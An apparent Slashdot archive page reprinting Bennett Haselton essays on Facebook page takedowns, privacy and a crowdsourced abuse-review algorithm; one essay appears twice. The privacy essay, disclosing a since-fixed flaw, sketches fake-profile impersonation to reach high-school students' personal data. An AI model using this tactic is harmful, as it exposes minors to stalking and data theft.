Slashdot Mirror

← Back to Domains

Domain: peacefire.org

Stories and comments across the archive that link to peacefire.org.

Stories · 223

  1. Anti-Porn Facebook Page is Deleted, Then Restored

    Yro · Censorship · · posted by Roblimo · from the let's-make-up-our-minds-here dept. · 145 comments
    Slashdot regular contributor Bennett Haselton writes: "An anti-porn organization's Facebook page is disabled by Facebook, and then resurrected. Was the page the victim of a 'complaint mob,' and could the previously-discussed 'voting algorithm' have saved the page from being shut down?"

    Speaking of Facebook pages being unjustly shut down, on Monday the anti-porn Facebook page http://www.facebook.com/PornHarms/, run by the non-profit Morality in Media, was abruptly disabled by Facebook. The page had 35,000 "likes" at the time the plug was pulled. Morality in Media CEO Patrick Trueman, who also ran the Facebook page, says he never received any warning from Facebook before the page was removed.

    Some time on Wednesday, the page was restored. I had emailed a contact at Facebook to ask why the page was shut down, and he replied later to say that it had been deleted in error and the page had been restored. (He didn't say whether the page was on track to being restored anyway, or whether it would have remained down indefinitely if I hadn't pinged him.)

    Facebook did not respond to inquiries as to why the page was removed, but as Evgeny Morozov has pointed out regarding political pages (and as many other users have heard from people's anecdotal experiences having pages pulled without explanation), it's common for pages on Facebook and YouTube to get removed that were almost certainly not violating those sites' Terms of Service. If enough users decide to file "abuse complaints" simultaneously against a piece of content on Facebook or YouTube, this has a good chance of getting the content removed, whether the complaints were legitimate or were simply part of an organized campaign of filing false complaints.

    Meanwhile, I correspond with dozens of people every week on Facebook (usually people who use my proxy sites to get on Facebook at school or work), and about once a week I get an automated message from Facebook that says, "You have been sending harassing messages to other users," and goes on to sternly list the types of messages that violate Facebook's TOS. (Only twice has this resulted in my account actually getting locked, and it was unlocked after I bugged my friend at Facebook about it.)

    I figure that these are either the result of users clicking "Report this message" accidentally, or parents hacking into their kids' accounts, reading their messages, and then trying to get the account shut down of the person who was talking their kid about proxy sites. In either case, I assume it's not the result of an "organized campaign," but perhaps your account gets locked if you're unlucky enough that two or three people file complaints within the same short time frame.

    So I have no reason to doubt Mr. Trueman's claim that the PornHarms Facebook page never contained any content that violated Facebook's TOS. He says the page mostly contained links to academic research supposedly demonstrating the harmful effects of pornography, and that while the target audience was adult academics, there was nothing in the content that most parents would consider inappropriate for underage viewers. There was certainly no actual pornography on the page, not even in censored form with the fun parts blurred out (although I didn't check every single academic paper linked from the site to see if any of them might have used pixellated/censored porn for illustrative purposes). Trueman also says that they prevented third-party users from posting on the PornHarms page directly, and regularly monitored the page's content to remove any "inappropriate" comments that users had written in response to the officially authorized posts. (Of course, even if the page admins hadn't done this, inappropriate comments should be the basis for penalizing the user who posted them, not the Facebook page that they were posted on, but it was a moot point in this case.)

    Because of the word "Pornography" in the title of the page, it's also of course possible that a human at Facebook actually did review the complaints, but thought the word "pornography" meant the page was a porn-trading hub, without looking to closely at it. (It's also possible that the word triggered an automated filter at Facebook. Obviously, there is no filter pre-emptively preventing pages with words like "pornography" in the title from being created, since otherwise the page never could have existed in the first place. But it's possible that an automated algorithm does something like the following: If a page receives X complains within time period Y, and the page contains certain keywords in the title or the content, then shut down the page automatically.)

    Previously I'd suggested an algorithm that Facebook could use to stop users from coordinating phony complaints in order to shut a page down. The gist was: If a page receives a sufficient number of complaints, have the page reviewed by a random sample (chosen by Facebook) of Facebook users who had signed up to review abuse cases in situations such as these. If enough of those users vote that the page was violating the TOS, the page gets shut down, but if not, then it stays up. What makes this algorithm difficult to abuse, is that in order for a "coordinated mob" to swing the vote of the jury, they would have to comprise a majority (or a significant minority) of the entire set of users that the randomly-selected jury could have been chosen from -- a difficult task if thousands of people have signed up as content reviewers. I offered a $100 prize to be split between readers who submitted the best suggested improvements or criticisms of the idea; their ideas were summarized in a follow-up article. A couple of readers commented that there was no point in debating the idea since I don't work for Facebook and have no influence there; they have a point, but the idea has to start somewhere. If engineers at Facebook are looking for a way to fix the problem, one thing that can be said about this suggestion is that it was posted to a large audience of smart people, and several readers suggested very clever improvements, while nobody found any obviously fatal flaws in it.

    It seems pretty likely that a process like that for reviewing abuse complaints, would have saved the Pornography Harms page from being yanked from Facebook. Anybody who seriously reviewed the page's contents for more than twenty seconds would have understood the page's real purpose and seen that it was not actually distributing pornography or otherwise violating the Facebook TOS. In my experiences posting surveys on sites like Mechanical Turk, where you can pay users a penny apiece for filling out surveys or performing other tasks, I've gotten the impression that people will take such tasks seriously, even for zero (or virtually zero) pay, if they find them interesting. In the case of the Facebook "jurors" who are voting on whether a page violated the TOS, you're talking about users who voluntarily signed up to be jurors, after all -- not underpaid workers grinding through as many tasks as they can squeeze into their working hours.

    Finally, it would be easy to point out the irony of a pro-censorship group being censored (and some people did, on the mailing lists where I saw this news announced), but I don't think that's really fair to Morality in Media, since even MIM doesn't oppose people's right to express their opinions in favor of pornography. Likewise, MIM presumably supports the use of Internet blocking programs in schools, even though their Facebook page (as well as the companion website PornHarms.com) would probably be blocked by default by most Internet blockers because of the word "porn" in the URL -- but even that is not as richly ironic as it would seem. Neither Morality in Media, nor almost anyone else, is in favor of political sites about pornography being blocked because of the word "porn" in the address; presumably they'd just want the error corrected by the blocking company, and if a left-wing site on the opposite side of the debate happened to be blocked because of the word "porn" in the URL, I have no reason to think that Morality in Media would be opposed to correcting that error and unblocking that site as well. So this really isn't a case of them being given "a taste of their own medicine."

    No, the real irony in this particular case -- at least, if I did have a role in getting their Facebook page restored -- is that not only would I support their right to express their view (duh), I would support students' right to bypass their school's Internet blocker to view the page from school if they had to, and I would even support the right of under-18-year-olds to view the page even if their parents were specifically trying to block them from it. I highly doubt that even anyone at Morality in Media would go that far.

  2. Privacy Hacking Worse Than PR Flacking

    Yro · Privacy · · posted by Roblimo · from the one-day-the-cool-kids-will-all-leave-Facebook dept. · 59 comments
    Here's frequent Slashdot contributor Bennett Haselton who writes "Facebook apparently hired a PR firm that tried to seduce some pundits into writing negative editorials about Google. The 'attack angle' would have been that Google was endangering users' privacy by scraping information about users from Facebook and making such information easier to find with a Google search." Hit the link below to read the rest of Bennett's story.

    The reliably cynical Seth Finkelstein commented that the attempted editorial-planting was just "often implicit dealing made explicit", (i.e. that pundits are drafted as fronts for corporate publicity campaigns like this all the time, and that the PR firm in this case spoiled the game by rudely blurting out the terms of the deal, like a guy offering to buy a girl dinner if she'll sleep with him). Steven Levy of Wired opined that with regard to the privacy issues, Facebook was the real villain for exposing information in the first place that many users would rather keep private.

    Some perspective here: In 2008, I was corresponding with a high school student (using one of the Circumventor sites to get around their local school Internet blocker, naturally) who mentioned that he was able to see all the personal information of other students in his Facebook high school network -- including email address, phone number, and home address, if the user had uploaded that information to Facebook -- even if those users had not confirmed him as a friend. (Facebook allows users to join one or more "networks" indicating their school affiliation, workplace, city of residence, etc. -- such networks are distinct from Facebook groups and fan pages.) Double-checking with a few more users in the same network and in other high school networks, we found that it really was possible for any member of a high school network to view the profiles of any other member of that high school network and see all of their personal information.

    Unlike other types of "networks" on Facebook, it is not possible to join a high school network simply by specifying it in your preferences. However, all of the students that I corresponded with said that in order to join their high school networks, they simply had to request to join the network, and then get a friend request confirmed by an existing member of that high school network. Which means that conning your way into the network would be easy: either (1) create a profile with the name and photo of a real student at that school, and send out friend requests to that student's friends, hoping that one of them would confirm you (not remembering that they had already friended that person under their real account), or (2) create a profile with a hot girl's picture and send out random friend requests to a bunch of guys in the network. Once you got confirmed, you'd have access to all the personal information that any student in that high school had posted on their profile. (I hasten to add that we did not actually try either of these things, but it stands to reason that it would work, since it wasn't functionally any different from what all of those students actually had to do in order to join their networks in the first place!)

    I sent a message to Facebook's security team about this, and got a non-form-letter response from a real person -- their reply, however, was that this behavior was by design:

    We believe this allows for greater sharing and helps make the site more useful for people, though we also recognize the potential for misuse. That's why we've built a peer verification system around the joining of high school networks. We also use automated systems to detect and flag anomalous behavior, like lots of messages sent to non-friends or a high percentage of ignored friend requests.

    Smart, but probably not secure enough. For one thing, if someone is creating disposable accounts to send out friend requests in hopes of getting into a high school network, it only has to work once, so even if most of their accounts get flagged for "anomalous behavior," they only need one that doesn't get flagged. And even if that account does get flagged and cancelled later, by that time it might be too late, if they've already grabbed enough users' information. In any case, some time between 2008 and 2011, Facebook did change the behavior of high school networks so that members can no longer see the personal information of other members without a confirmed friend request. But this loophole was not that difficult to find, and it's likely that at least a few other users had discovered the same issue.

    Now, imagine what would have happened if Facebook had announced that, for a fee of a few hundred dollars, they were offering CDs for sale containing the names, addresses, mobile phone numbers, and instant messenger names of all the high school students on their site (along with, of course, all the photos those students had posted of themselves). It goes without saying that after the class action lawsuits had finished, there'd be nothing left of the company but a smoldering crater. Now, I'm not suggesting that Facebook's security policy for high school networks was anywhere near as bad as selling CDs with all the personal information of their high school users, but it's worth thinking about why it should not be considered as bad. In either case, anybody willing to spend a few hundred dollars (or, equivalently, a few hundred dollars' worth of effort -- the effort to discover the loophole, and then to crank out the friend requests) could obtain the personal information of as many high school students as they wanted. What's the difference?

    Well, obviously, there's the message that it would send if a company like Facebook offered to sell CDs full of users' personal information. It would lower the bar for future behavior by similar companies, it would make users extremely cynical about trusting the motivations of social networking sites, and in the long run it might even cause courts to decide that users had no reasonable expectation of privacy when joining those sites, because it was "common knowledge" and "common practice" that those sites offered up people's personal information for sale! On the other hand, if Facebook makes that information available indirectly through "benign neglect" -- by, for example, forcing you to create a fake high school profile and send out a bunch of friend requests and create a new profile from scratch if your first one gets canned -- that's far less likely to cause the side effects I just listed. MySpace is not going to get the idea that it's OK to start selling CDs of users' personal information because, hey, Facebook let people pry out the same information if they jumped through enough hoops.

    But what this means is that fairly mild privacy issues, if they arise as a result of deliberate choice by a company like Facebook, are likely to get more press attention than far more serious privacy issues that arise as a result of benign neglect. Because when Facebook makes a deliberate choice that affects user privacy (like sharing users' preferences with Pandora), the pundits and the public are reacting to the direct privacy implications of that action, plus all the auxiliary issues, like the "message" that it sends, and the precedent that it sets for future actions by that company and other companies. Whereas if an issue arises as a result of neglect (as in the case of PlayStation Networks users' credit cards being stolen), people are reacting only to the direct privacy implications of the incident, so the issue has to be much more serious to get the equivalent amount of press.

    For example, the right reason to be concerned about Facebook sharing users' personal information with Pandora, was the principle that it violated -- if users say "no" to sharing their personal information, Facebook shouldn't be allowed to switch that choice unilaterally. But as for the practical implications -- come on. Facebook and Pandora are both big faceless corporate behemoths as far as we're concerned, so why would we trust one with our personal data but not the other? Besides, what if Facebook had simply bought out Pandora? Then they could share all of our personal information with all the employees of the newly merged Facepanbookdora, and the exact same people would have had access to the exact same data, but it wouldn't have violated the agreement against sharing information with "third parties," because they wouldn't be a third party any more.

    When I first found that email addresses of Ameritrade customers had been obtained by a pump-and-dump stock spammer, I was sure (as were most readers, probably) that Ameritrade was not deliberately selling its customers' email addresses; I figured that they had simply left their database inadequately secured, and some third party had broken in and stolen it. On the other hand, because the incident happened as a result of benign neglect and not deliberate choice, I figured the incident would not garner much press as a result, and that seems to have been the case -- the wholesale thievery of Ameritrade customers' personal information by financial criminals received far less press attention than, say, Facebook's decision to change their privacy policy so they could share information with Pandora.

    What this means is that if you're an ardent cyber-rights hippie like me, then yes, you should care about the privacy issues that set the blogosphere afire, even if they're fairly minor privacy issues that are magnified out of proportion because they speak to the deliberate intentions of the companies involved. It matters that Facebook decided one day to share our music preferences with Pandora, even if it doesn't hurt anyone.

    On the other hand, if you simply care about threats to your personal privacy, then you should heavily discount the noise being made about deliberate choices taken by companies like Facebook, and pay far more attention to dangers of benign neglect by the company guarding your privacy, when that benign neglect is exploited by malicious outsiders. If you have a stalker and you're worried about them finding your Facebook profile, it makes no sense to be worried about Google scraping the information from the public version of your Facebook profile, if it's the same information that your stalker would be able to see anyway if they were logged in to Facebook themselves. It's far more likely that your stalker would try to exploit a weakness in Facebook's privacy settings -- for example, ingratiating themselves with one of your Facebook friends and getting them to accept a friend request, so that they can then see any information on your Facebook profile that is viewable to "friends of friends." Maybe you knew about that already, but if you didn't, you wouldn't know it from reading all the punditry about the Facebook-Google kerfuffle.

  3. Privacy Hacking Worse Than PR Flacking

    Yro · Privacy · · posted by Roblimo · from the one-day-the-cool-kids-will-all-leave-Facebook dept. · 59 comments
    Here's frequent Slashdot contributor Bennett Haselton who writes "Facebook apparently hired a PR firm that tried to seduce some pundits into writing negative editorials about Google. The 'attack angle' would have been that Google was endangering users' privacy by scraping information about users from Facebook and making such information easier to find with a Google search." Hit the link below to read the rest of Bennett's story.

    The reliably cynical Seth Finkelstein commented that the attempted editorial-planting was just "often implicit dealing made explicit", (i.e. that pundits are drafted as fronts for corporate publicity campaigns like this all the time, and that the PR firm in this case spoiled the game by rudely blurting out the terms of the deal, like a guy offering to buy a girl dinner if she'll sleep with him). Steven Levy of Wired opined that with regard to the privacy issues, Facebook was the real villain for exposing information in the first place that many users would rather keep private.

    Some perspective here: In 2008, I was corresponding with a high school student (using one of the Circumventor sites to get around their local school Internet blocker, naturally) who mentioned that he was able to see all the personal information of other students in his Facebook high school network -- including email address, phone number, and home address, if the user had uploaded that information to Facebook -- even if those users had not confirmed him as a friend. (Facebook allows users to join one or more "networks" indicating their school affiliation, workplace, city of residence, etc. -- such networks are distinct from Facebook groups and fan pages.) Double-checking with a few more users in the same network and in other high school networks, we found that it really was possible for any member of a high school network to view the profiles of any other member of that high school network and see all of their personal information.

    Unlike other types of "networks" on Facebook, it is not possible to join a high school network simply by specifying it in your preferences. However, all of the students that I corresponded with said that in order to join their high school networks, they simply had to request to join the network, and then get a friend request confirmed by an existing member of that high school network. Which means that conning your way into the network would be easy: either (1) create a profile with the name and photo of a real student at that school, and send out friend requests to that student's friends, hoping that one of them would confirm you (not remembering that they had already friended that person under their real account), or (2) create a profile with a hot girl's picture and send out random friend requests to a bunch of guys in the network. Once you got confirmed, you'd have access to all the personal information that any student in that high school had posted on their profile. (I hasten to add that we did not actually try either of these things, but it stands to reason that it would work, since it wasn't functionally any different from what all of those students actually had to do in order to join their networks in the first place!)

    I sent a message to Facebook's security team about this, and got a non-form-letter response from a real person -- their reply, however, was that this behavior was by design:

    We believe this allows for greater sharing and helps make the site more useful for people, though we also recognize the potential for misuse. That's why we've built a peer verification system around the joining of high school networks. We also use automated systems to detect and flag anomalous behavior, like lots of messages sent to non-friends or a high percentage of ignored friend requests.

    Smart, but probably not secure enough. For one thing, if someone is creating disposable accounts to send out friend requests in hopes of getting into a high school network, it only has to work once, so even if most of their accounts get flagged for "anomalous behavior," they only need one that doesn't get flagged. And even if that account does get flagged and cancelled later, by that time it might be too late, if they've already grabbed enough users' information. In any case, some time between 2008 and 2011, Facebook did change the behavior of high school networks so that members can no longer see the personal information of other members without a confirmed friend request. But this loophole was not that difficult to find, and it's likely that at least a few other users had discovered the same issue.

    Now, imagine what would have happened if Facebook had announced that, for a fee of a few hundred dollars, they were offering CDs for sale containing the names, addresses, mobile phone numbers, and instant messenger names of all the high school students on their site (along with, of course, all the photos those students had posted of themselves). It goes without saying that after the class action lawsuits had finished, there'd be nothing left of the company but a smoldering crater. Now, I'm not suggesting that Facebook's security policy for high school networks was anywhere near as bad as selling CDs with all the personal information of their high school users, but it's worth thinking about why it should not be considered as bad. In either case, anybody willing to spend a few hundred dollars (or, equivalently, a few hundred dollars' worth of effort -- the effort to discover the loophole, and then to crank out the friend requests) could obtain the personal information of as many high school students as they wanted. What's the difference?

    Well, obviously, there's the message that it would send if a company like Facebook offered to sell CDs full of users' personal information. It would lower the bar for future behavior by similar companies, it would make users extremely cynical about trusting the motivations of social networking sites, and in the long run it might even cause courts to decide that users had no reasonable expectation of privacy when joining those sites, because it was "common knowledge" and "common practice" that those sites offered up people's personal information for sale! On the other hand, if Facebook makes that information available indirectly through "benign neglect" -- by, for example, forcing you to create a fake high school profile and send out a bunch of friend requests and create a new profile from scratch if your first one gets canned -- that's far less likely to cause the side effects I just listed. MySpace is not going to get the idea that it's OK to start selling CDs of users' personal information because, hey, Facebook let people pry out the same information if they jumped through enough hoops.

    But what this means is that fairly mild privacy issues, if they arise as a result of deliberate choice by a company like Facebook, are likely to get more press attention than far more serious privacy issues that arise as a result of benign neglect. Because when Facebook makes a deliberate choice that affects user privacy (like sharing users' preferences with Pandora), the pundits and the public are reacting to the direct privacy implications of that action, plus all the auxiliary issues, like the "message" that it sends, and the precedent that it sets for future actions by that company and other companies. Whereas if an issue arises as a result of neglect (as in the case of PlayStation Networks users' credit cards being stolen), people are reacting only to the direct privacy implications of the incident, so the issue has to be much more serious to get the equivalent amount of press.

    For example, the right reason to be concerned about Facebook sharing users' personal information with Pandora, was the principle that it violated -- if users say "no" to sharing their personal information, Facebook shouldn't be allowed to switch that choice unilaterally. But as for the practical implications -- come on. Facebook and Pandora are both big faceless corporate behemoths as far as we're concerned, so why would we trust one with our personal data but not the other? Besides, what if Facebook had simply bought out Pandora? Then they could share all of our personal information with all the employees of the newly merged Facepanbookdora, and the exact same people would have had access to the exact same data, but it wouldn't have violated the agreement against sharing information with "third parties," because they wouldn't be a third party any more.

    When I first found that email addresses of Ameritrade customers had been obtained by a pump-and-dump stock spammer, I was sure (as were most readers, probably) that Ameritrade was not deliberately selling its customers' email addresses; I figured that they had simply left their database inadequately secured, and some third party had broken in and stolen it. On the other hand, because the incident happened as a result of benign neglect and not deliberate choice, I figured the incident would not garner much press as a result, and that seems to have been the case -- the wholesale thievery of Ameritrade customers' personal information by financial criminals received far less press attention than, say, Facebook's decision to change their privacy policy so they could share information with Pandora.

    What this means is that if you're an ardent cyber-rights hippie like me, then yes, you should care about the privacy issues that set the blogosphere afire, even if they're fairly minor privacy issues that are magnified out of proportion because they speak to the deliberate intentions of the companies involved. It matters that Facebook decided one day to share our music preferences with Pandora, even if it doesn't hurt anyone.

    On the other hand, if you simply care about threats to your personal privacy, then you should heavily discount the noise being made about deliberate choices taken by companies like Facebook, and pay far more attention to dangers of benign neglect by the company guarding your privacy, when that benign neglect is exploited by malicious outsiders. If you have a stalker and you're worried about them finding your Facebook profile, it makes no sense to be worried about Google scraping the information from the public version of your Facebook profile, if it's the same information that your stalker would be able to see anyway if they were logged in to Facebook themselves. It's far more likely that your stalker would try to exploit a weakness in Facebook's privacy settings -- for example, ingratiating themselves with one of your Facebook friends and getting them to accept a friend request, so that they can then see any information on your Facebook profile that is viewable to "friends of friends." Maybe you knew about that already, but if you didn't, you wouldn't know it from reading all the punditry about the Facebook-Google kerfuffle.

  4. My Crowdsourced Follow-Up About Crowdsourcing

    Features · · posted by CmdrTaco · from the department-of-redundancy dept. · 59 comments
    Slashdot regular contributor Bennett Haselton writes "In my last article, I proposed an algorithm that Facebook could use to handle abuse complaints, which would make it difficult for co-ordinated mobs to get unpopular content removed by filing complaints all at once. I offered a total of $100 for the best reader suggestions on how to improve the idea, or why they thought it wouldn't work. Read their suggestions and decide what value I got for my infotainment dollar."

    In my last article, I proposed an algorithm that Facebook could use to handle abuse complaints, which would scale to a large number of users while also making it difficult for co-ordinated mobs to get unpopular content removed by filing complaints all at once. I offered a total of $100 to readers sending in the best suggestions for improvements, or alternative algorithms, or fatal flaws in the whole idea that would require starting from scratch. As the suggestions were coming in, Facebook obligingly kept the issue in the news by removing a photo of two men kissing from a user's profile, sending a form letter to the user that they had violated Facebook's prohibition on "nudity, or any kind of graphic or sexually suggestive content". (It would be a cheap shot to say that a photo of a man and a woman kissing probably would not have been removed; in truth, probably just about anything will get removed from Facebook automatically if enough users file complaints against it, which is the problem for unpopular but legal content.)

    How would these complaints have been handled under my proposed algorithm? The gist of my idea was that any users could sign up to be voluntary reviewers of "abuse complaints" filed against public content on Facebook. Once Facebook had built up a roster of tens of thousands of reviewers, new abuse complaints would be handled as follows. When a complaint (or some threshold of complaints) is filed against a piece of content, a random group of, say, 100 users could be selected from the entire population of eligible reviewers, and Facebook would send them a request to "vote" on whether that content violated the Terms of Service. If the number of "Yes" votes exceeded some threshold, the content would be removed (or at least, put in a high-priority queue for a Facebook employee to determine if the content really did warrant removal). The main benefit of this algorithm is that would be much harder for co-ordinated mobs to "game the system", because in order to swing the vote, they would have to comprise a significant fraction of the 100 randomly selected reviewers, and to achieve that, the mob members would have to comprise a significant fraction of the entire reviewer population. This would be prohibitively difficult if hundreds of thousands of users signed up as content reviewers.

    All of the emails I received -- not just "almost" all of them, but really all of them -- contained some insightful suggestions worth mentioning, although there was some duplication between the ideas. If you didn't see the last article, you might consider it worth while to stop reading before proceeding further, and mull over the description of the algorithm above to see how you would improve it. Then read the suggestions that came in to see how well your ideas matched up with the submissions I received.

    The upshot is that nobody found what I believed to be completely fatal flaws, although one reader brought something to my attention that might cause trouble for the algorithm after a few more years. Beyond that, reader suggestions could be divided essentially into two categories. The first category of suggestions related to ensuring that the basic premise would actually work -- that the votes cast by a random sample would be representative of general user opinion, and could not be gamed by a coordinated mob or a very resourceful cabal trying to game the system. The second category of suggestions started by assuming that the voting system would work, and suggested other features that could be added to the algorithm -- or, in one case, an entire alternative algorithm to replace it.

    To begin with the attacks and counter-attacks against the basic voting algorithm. Walter Freeman and Haydn Huntley independently suggested monitoring for users who vote in a small minority in a significant portion of vote-offs, and reducing their influence in future votes (by either not inviting them to vote on future juries, or sending them the future invites but then ignoring their votes anyway). The assumption is that if a user is frequently among the 10% who vote "Yes [this is abuse]" when the other 90% of respondents are voting "No [this is not abuse]", or vice versa, then that user is voting randomly, or their point of view is so skewed that their votes could safely be ignored even if they are sincere. I like the idea of eliminating deadweight voters, but this might also incentivize voters to vote the way they think the crowd would vote, instead of voting their true opinions -- for example, if they were called to vote on an anti-Obama page that showed Obama wearing a Hitler mustache. Some people's knee-jerk reaction would be to call the page "racist" or "hate speech" or "a threat of violence", even though comparing Obama to Hitler is not, strictly speaking, any of those things. If I were voting my honest opinion, I would count that page as "not abuse". But if I knew that I were voting along with dozens of other people, and my future voting rights might be revoked if I didn't vote with the majority, I might be tempted to vote "abuse".

    Similarly, Walter Freeman and reader "mjrosenbaum" both suggested setting deliberate traps for deadweight users, by creating artificial cases where the answer was pre-determined to be obviously yes or obviously no, calling for votes, and revoking privileges for users who gave the wrong answer. This would eliminate the problem of borderline cases like the one above, where smart users think, "I suspect the majority will give the wrong answer, so I'm just going to go with the crowd, to keep my voting rights." On the other hand, it's more labor for Facebook to create the cases, and any public content authored by them -- especially content that is deliberately crafted to be "questionable" -- would probably have to run a gauntlet of being reviewed by lawyers and PR mavens before being released. My suggestion would be to use these artificial scenarios periodically to make sure that the system is working (i.e. that juries are giving the right answers), but it would be too inefficient to use it to try and weed out problem voters.

    In fact, these and several other suggestions fell into a category of ideas that could possibly improve the efficiency of the algorithm by reducing voter shenanigans (where "efficient" means that fewer users have to be invited to each vote-off in order to get statistically valid results), but might not be worth the effort. As long as most of the votes cast by users are sane and sincere, all you have to do is invite enough voters to a vote-off, and the majority will still get the correct answer most of the time, even if you have problem voters in the system. That's the simplest possible algorithm. The more complicated an algorithm you come up with, the more likely that Facebook (or any other site you recommended this to) would just throw up their hands and say, "Sounds too hard", and leave the idea dead in the water. That's why I like the algorithm as lean and tight as possible.

    So it's not quite like designing an algorithm for your own use, where you could feel free to introduce more complications as long as you're responsible for keeping track of them. In recommending an algorithm for widespread adoption, the basic form of the algorithm should be as simple as possible. In the case of the voting algorithm some interesting wrinkles may come up if you don't eliminate problem voters, but this is not fatal to the idea as long as it's still true that, given a large enough random sample of voters, the majority will tend to vote the correct answer.

    For example, James Renken pointed out that as voters dropped out due to boredom, the remaining users casting votes would tend to be either (1) weirdos who just wanted to view questionable material; and (2) prudes bent on removing as much material from Facebook as possible. But that's OK, as long as those two groups vote sanely enough (or as long as there are enough sane users outside those two groups) that material which does violate the TOS, tends to get more "Yes [this is abuse]" votes than material that doesn't. Then all you have to do is make the jury size large enough to make a statistically significant distinction between those two cases.

    Similarly, Joshua Megerman suggested surveying users for their religious, political, and other beliefs when they sign up as volunteer reviewers (they could of course decline the survey). This makes it possible, insofar as people answer truthfully, to make sure that a jury is composed of a group with diverse belief sets. (On the other hand, users could game the system by reporting beliefs that are the opposite of what they truly feel. For example, if you're a leftist, register as a right-winger. Then when an abuse case comes before you, if it's a piece of content more offensive to leftists, then the real leftists on the jury will tend to vote against it -- but as a registered right-winger, you'll be able to cast a vote against it as well, and you'll be displacing a real right-wing voter who probably wouldn't have voted that way, so your vote will be worth more!) Again, it's fine if Facebook wants to do this, but even without collecting this data and simply selecting jurors at random, it should still be true that genuinely abusive pages get more "Yes" votes in a jury vote, than non-abusive pages.

    Lastly in the "keep the jurors honest" category, Paul Ellsworth suggested allowing jurors to anonymously review each other -- when a given juror is chosen for the "hot seat" (perhaps randomly, perhaps as a result of a history of skewed voting), other jurors are randomly selected from the voting pool, to review that juror's voting record and decide whether that juror has been voting honestly and judiciously, or not. When I first read this idea, I instinctively thought that because a contaminated jury pool would be reviewing itself, it would not be able to reduce the percentage of problem voters, but a little more thought revealed that this isn't true. Suppose initially your jury pool consists of 80% "honest voters" and 20% "dishonest voters", that honest voters who review the voting record of another voter will always vote correctly whether that person is "honest" or "dishonest", and that dishonest voters will always vote incorrectly. It's still the case that when a voter's record is reviewed by a panel of, say, 20 other voters, virtually 100% of the time the majority will get the right answer. If you strip voting rights from a voter whenever a jury of other voters determines them to be a "dishonest voter", then over time, the percentage of honest voters in the system will creep from 80% to 100%. So again, this might work, and again, it might just be adding unnecessary complexity if the basic algorithm could work without it.

    Note that none of these precautions would address the case of a "sleeper" voter -- a voter who joins the system with the sole intention of voting incorrectly on particular types of cases (perhaps planning on voting "yes" to shut down pages made by a particular organization, or pages advocating a particular view on a single issue), while still planning to vote correctly on everything else. By voting honestly in all other cases, they prevent themselves from being flagged by the system for casting too many minority votes, or from being blacklisted by other jurors for having a questionable overall voting record. The only real way I can see to address this problem is to hope that such users are outnumbered by the honest users in the system, and that juries are large enough that the chances of "rogue voters" gaining a majority on any one jury are nearly zero.

    Which brings us to the one potentially fatal weakness in the system that I'm aware of: reader George Lawton referred me to a program run by the U.S. government to create armies of fake accounts to infiltrate social media, named, apparently without irony, Earnest Voice:

    The project aims to enable military personnel to control multiple 'sock puppets' located at a range of geographically diverse IP addresses, with the aim of spreading pro-US propaganda.

    An entity with the resources of the U.S. military could potentially create enough remote-controlled voters to overwhelm the system. I'm not sure if there is a way to deal with a system if the majority of voters are compromised. Presumably by making all decisions appealable to a core group of trusted Facebook employees at the top (although this then creates a bottleneck and limits scalability, especially if filing an appeal is free and all the parties who lose abuse cases are constantly filing appeals to the next level up).

    Now. On to the second category of suggestions: Assuming the majority of voters are honest, what other features would be desirable to build into the system?

    Walter Freeman, on the subject of filing appeals, suggested putting appealed pages in a special queue where they could be publicly viewed and users could comment on the ongoing appeals process, in addition to reading arguments posted by either side; this also negates the censorship itself due to the to the Streisand effect. I agree, but it's not obvious why this is a desirable feature. This does create perverse incentives, since some users could get extra traffic for their content by creating a page that makes whatever argument you're trying to promote, spiking it with some TOS-violating content, waiting for the page to get shut down, appealing the decision, and enjoying all the extra Streisand attention that it gets while on public display during the "appeal".

    Meanwhile, James Renken pointed out that the system would work best for content that was originally public anyway, like a controversial Facebook page or event. If someone filed a complaint regarding a private message that they received, and they wanted a "jury vote" about whether the content of the message constituted abuse, then either the sender or the recipient would have to waive their right to privacy regarding the message before it could be shared with jurors. If the message really was abusive, then in some cases the recipient might waive their privacy rights -- reasoning that they didn't mind sharing the nasty message that someone sent them, in order to get the sender's account penalized. The problem arises if the message also contains sensitive personal facts about the recipient, which they wouldn't want to share with anonymous jurors. The system could allow them to black out any personal information before submitting the message for review, but that creates a recursive problem of abuse within the abuse system -- how do you know that someone didn't alter the content (and thus the offensiveness) of the message through their selective blacking-out? So it's not obvious whether this idea could be applied to non-public content at all.

    Reader George Lawton suggested allowing content reviewers to vote on the funniest or weirdest content they had to review, to be posted in a public "Hall of Infamy". I love the thought of this, but I think Facebook's lawyers would be uncomfortable glamorizing anything questionable even if it were ultimately voted to be non-abusive (and certainly if it was voted to be abusive). Besides, this also has the perverse-incentives problem -- tie your message to something that you know will not only get an abuse complaint, but will hopefully end up in the Hall of Weird. (Even without the abuse jury system, there are already plenty of incentives for people to make a political point and hope that it will go viral.)

    David Piepgrass suggested that new content reviewers should be allowed to specify certain types of content that they don't want to be asked to review -- nudity, graphic violence, etc. This sounds like a good idea. He adds that users probably shouldn't be able to opt-in only to review certain categories of content (or jurors might sign up only to review nudity, and then who would be left to review the death threats?).

    Finally, in the other corner: Jerome Shaver suggested bypassing the jury voting system altogether and working on a heuristic algorithm to determine when abuse reports were being submitted by organized mobs of users, based on the patterns shown by mutual friendships between the users filing the abuse reports. The difficulties in designing such an algorithm, are too complicated to summarize quickly, and could fill an entire separate article. (Convince yourself that it's not an easy problem to solve. You can't just ignore abuse complaints from clusters of users that have many mutual friendships, because it can happen that real tight-knit communities of users might file abuse complaints against a piece of content, where the complaints are actually genuine.) But again, there is the problem that if a proposed solution is too complicated or too nebulous, Facebook has the excuse that they are "weighing several options", that they're "already working on something similar internally", etc. The jury vote system has the advantage that it can be described in just a few sentences, and the general public always knows whether it has been implemented or not -- which means that as long as abuses of the complaint system continue, people can ask, "Why doesn't Facebook try this?"

    You'll notice this is just a laundry list of the ideas I received, without any definitive conclusions about which ones are good or bad, but that's all I was going for. The original algorithm, I could argue with the force of mathematical proof that, under certain reasonable assumptions, it would work. There's no such proof or disproof for any of the suggested modifications, so I don't feel as strongly about any of them. But at the top of the article I suggested for readers to stop reading and see how many of these ideas they could come up with on their own. How did you do?

    The final honor roll of readers who were each the first, or only, person to submit an original idea: Walter Freeman (bonus points for getting in several good ones), James Renken, Joshua Megerman, Paul Ellsworth, George Lawton, Jerome Shaver, and David Piepgrass. Most of them volunteered to donate their winnings to charity, and agreed to let me donate their share to Vittana, which arranges microloans to college students in developing countries. One preferred a charity of their choosing, and only one actually kept the money. To be clear, for future contests, it's awesome if you want to donate the money to charity, but it's not dickish to keep it. That was the original deal after all.

